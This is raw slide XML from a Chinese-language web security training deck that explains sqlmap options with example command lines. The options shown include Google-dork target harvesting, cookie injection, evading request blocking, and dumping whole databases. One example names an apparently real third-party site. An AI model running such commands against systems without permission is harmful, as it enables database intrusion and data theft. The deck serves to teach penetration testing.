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3"/>
    <p:sldId id="30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BE4"/>
    <a:srgbClr val="7DE2E7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4714" y="2500439"/>
            <a:ext cx="7142573" cy="100952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4714" y="3602038"/>
            <a:ext cx="7142573" cy="56181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603102"/>
            <a:ext cx="12192000" cy="2548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安全培训         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>http://www.cracer.com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="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86080" y="544830"/>
            <a:ext cx="5865495" cy="648335"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3600" b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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="668BE4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725805" y="1547461"/>
            <a:ext cx="10515600" cy="4207859"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr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zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="668BE4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="668B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C58B-1263-4BF1-AC00-D94967AC28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2E82-1B0D-4500-9A39-2FD7D9C8CF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url:por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64970" y="1818640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928806" y="4956329"/>
            <a:ext cx="2111232" cy="478972"/>
            <a:chOff x="4909756" y="5374159"/>
            <a:chExt cx="2111232" cy="478972"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="流程图: 终止 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4909756" y="5374159"/>
              <a:ext cx="2111232" cy="478972"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartTerminator">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1BA0C9"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1BA0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17096" y="5414799"/>
              <a:ext cx="1496695" cy="397510"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1BA0C9"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91436" tIns="45718" rIns="91436" bIns="45718" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="456565"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>BY    Cracer</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" sz="200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106" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2251075" y="2193290"/>
            <a:ext cx="7235825" cy="1439863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1BA0C9"/>
          </a:solidFill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3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方正综艺简体" charset="-122"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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方正综艺简体" charset="-122"/>
                <a:sym typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>安全测试</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="方正综艺简体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1800" kern="120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SQLMAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0" smtClean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风险等级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--risk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en-US" altLang="zh-CN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共有四个风险等级，默认是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会测试大部分的测试语句，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会增加基于事件的测试语句，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会增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句的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注入测试。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在有些时候，例如在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的语句中，注入一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的测试语句，可能导致更新的整个表，可能造成很大的风险。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测试的语句同样可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>xml/payloads.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中找到，你也可以自行添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload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zh-CN" altLang="pl-PL" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="pl-PL" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--url</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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pl-PL" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http(s)://targeturl[:port]/[…]</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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pl-PL" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>python sqlmap.py -u http://www.target.com/vuln.php?id=1</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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pl-PL" altLang="zh-CN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pl-PL" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="pl-PL" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--url</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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pl-PL" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>格式：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http(s)://targeturl[:port]/[…]</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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pl-PL" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>python sqlmap.py -u "http://www.target.com/vuln.php?id=1"</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL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pl-PL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pl-PL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  <a:p>
            <a:endParaRPr lang="pl-PL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从文本中获取多个目标扫描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-m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文件中保存</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0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格式如下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>会一个一个检测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www.target1.com/vuln1.php?q=foobar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www.target2.com/vuln2.asp?id=1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www.target3.com/vuln3/id/1*</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求注入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-r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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以从一个文本文件中获取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请求，这样就可以跳过设置一些其他参数（比如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数据，等等）。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比如文本文件内如下：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POST /vuln.php HTTP/1.1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Host: www.target.com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User-Agent: Mozilla/4.0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id=1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>搜索结果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-g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en-US" altLang="zh-CN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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以测试注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的搜索结果中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>参数（只获取前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个结果）。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例子：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python sqlmap.py -g "inurl:php?id="</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="1200" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p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--data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此参数是把数据以POST方式提交，sqlmap会像检测GET参数一样检测POST的参数。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例子：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python sqlmap.py -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>“http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>://www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cracer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cracer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>php” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>--data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>id=1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--param-del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参数拆分字符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当GET或POST的数据需要用其他字符分割测试参数的时候需要用到此参数。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例子：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>python sqlmap.py -u "http://www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cracer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>.com/vuln.php" --data="query=foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>d=1" --param-del=";" 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--cookie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适用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入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将参加加入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入测试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sqlmap -u "http://www.ntjx.org/jsj/DownloadShow.asp" --cookie "id=9" --table --level 2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080" y="544830"/>
            <a:ext cx="7569200" cy="648335"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--referer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--headers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--proxy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 dirty="0"/>
              <a:t>--referer</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>sqlmap可以在请求中伪造HTTP中的referer，当--level参数设定为3或者3以上的时候会尝试对referer注入。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--headers</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以通过--headers参数来增加额外的http头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hearders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> “client-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>: 1.1.1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>'”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--proxy</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用--proxy代理是格式为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://url:port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--proxy=http://127.0.0.1:1080</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--proxy-file c:/1.txt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10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>--delay</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以设定两个HTTP(S)请求间的延迟，设定为0.5的时候是半秒，默认是没有延迟的。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--timeout</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可以设定一个HTTP(S)请求超过多久判定为超时，10.5表示10.5秒，默认是30秒。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>设定重试超时</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>--retries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当HTTP(S)超时时，可以设定重新尝试连接次数，默认是3次。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设定随机改变的参数值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3590925" cy="6899910"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="5561351" cy="6899639"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="矩形 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-1"/>
              <a:ext cx="5561351" cy="6858002"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a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20000" contrast="-40000"/>
                        </a14:imgEffect>
                        <a14:imgEffect>
                          <a14:saturation sat="2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r="-119980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-1"/>
              <a:ext cx="5561351" cy="6899639"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="157E9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1855" y="887730"/>
            <a:ext cx="16605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Levenim MT" panose="02010502060101010101" pitchFamily="2" charset="-79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Levenim MT" panose="02010502060101010101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7150" y="174498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介绍与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常规操作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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36590" y="1847215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077585" y="2204720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19850" y="2481580"/>
            <a:ext cx="3398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基本参数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9290" y="2583815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altLang="zh-CN" sz="2000" b="1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90285" y="2941320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29375" y="3215005"/>
            <a:ext cx="3871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获取目标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58815" y="3317240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altLang="zh-CN" sz="2000" b="1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6099810" y="3674745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42075" y="3951605"/>
            <a:ext cx="3858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常用操作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71515" y="4053840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altLang="zh-CN" sz="2000" b="1" dirty="0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112510" y="4411345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--safe-url,--safe-freq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有的web应用程序会在你多次访问错误的请求时屏蔽掉你以后的所有请求，这样在sqlmap进行探测或者注入的时候可能造成错误请求而触发这个策略，导致以后无法进行。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绕过这个策略有两种方式：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1、--safe-url：提供一个安全不错误的连接，每隔一段时间都会去访问一下。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2、--safe-freq：提供一个安全不错误的连接，每次测试请求之后都会再访问一边安全连接。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-p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sqlmap默认测试所有的GET和POST参数，当--level的值大于等于2的时候也会测试HTTP Cookie头的值，当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。但是你可以手动用-p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参数设置想要测试的参数。例如： -p "id,user-anget"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--prefix,--suffix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10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有些环境中，需要在注入的payload的前面或者后面加一些字符，来保证payload的正常执行。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例如，代码中是这样调用数据库的：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>$query = "SELECT * FROM users WHERE id=(’" . $_GET[’id’] . "’) LIMIT 0, 1"; </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这时你就需要--prefix和--suffix参数了：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "’)" --suffix "AND (’abc’=’abc"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这样执行的SQL语句变成：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>$query = "SELECT * FROM users WHERE id=(’1’) &lt;PAYLOAD&gt; AND (’abc’=’abc’) LIMIT 0, 1"; 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--technique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这个参数可以指定sqlmap使用的探测技术，默认情况下会测试所有的方式。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支持的探测方式如下：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B: Boolean-based blind SQL injection（布尔型注入）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>E: Error-based SQL injection（报错型注入）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>U: UNION query SQL injection（可联合查询注入）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>S: Stacked queries SQL injection（可多语句查询注入）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>T: Time-based blind SQL injection（基于时间延迟注入）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--union-cols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默认情况下sqlmap测试UNION查询注入会测试1-10个字段数，当--level为5的时候他会增加测试到50个字段数。设定--union-cols的值应该是一段整数，如：12-16，是测试12-16个字段数。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--union-char</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>默认情况下sqlmap针对UNION查询的注入会使用NULL字符，但是有些情况下会造成页面返回失败，而一个随机整数是成功的，这是你可以用--union-char只定UNION查询的字符。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>二阶SQL注入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--second-order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有些时候注入点输入的数据看返回结果的时候并不是当前的页面，而是另外的一个页面，这时候就需要你指定到哪个页面获取响应判断真假。--second-order后门跟一个判断页面的URL地址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080" y="544830"/>
            <a:ext cx="7877810" cy="648335"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>--dump-all,--exclude-sysdbs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使用--dump-all参数获取所有数据库表的内容，可同时加上--exclude-sysdbs只获取用户数据库的表，需要注意在Microsoft SQL Server中master数据库没有考虑成为一个系统数据库，因为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有的管理员会把他当初用户数据库一样来使用它。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--search,-C,-T,-D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--search可以用来寻找特定的数据库名，所有数据库中的特定表名，所有数据库表中的特定字段。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可以在一下三种情况下使用：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-C后跟着用逗号分割的列名，将会在所有数据库表中搜索指定的列名。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>-T后跟着用逗号分割的表名，将会在所有数据库中搜索指定的表名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>-D后跟着用逗号分割的库名，将会在所有数据库中搜索指定的库名。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--udf-inject,--shared-lib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你可以通过编译MySQL注入你自定义的函数（UDFs）或PostgreSQL在windows中共享库，DLL，或者Linux/Unix中共享对象，sqlmap将会问你一些问题，上传到服务器数据库自定义函数，然后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根据你的选择执行他们，当你注入完成后，sqlmap将会移除它们。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-s,-t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参数：-s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sqlmap对每一个目标都会在output路径下自动生成一个SQLite文件，如果用户想指定读取的文件路径，就可以用这个参数。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>保存HTTP(S)日志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参数：-t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这个参数需要跟一个文本文件，sqlmap会把HTTP(S)请求与响应的日志保存到那里。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SQLMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN"/>
              <a:t>介绍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7505" marR="0" lvl="0" indent="-357505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charset="0"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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是一个由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Python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语言编写的开源渗透测试工具，它主要用来检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql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注入漏洞，是一款功能强大的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql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漏洞检测利用工具。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57505" marR="0" lvl="0" indent="-357505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charset="0"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US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57505" marR="0" lvl="0" indent="-357505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charset="0"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pP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它可以检测的数据库有：</a:t>
            </a:r>
            <a:r>
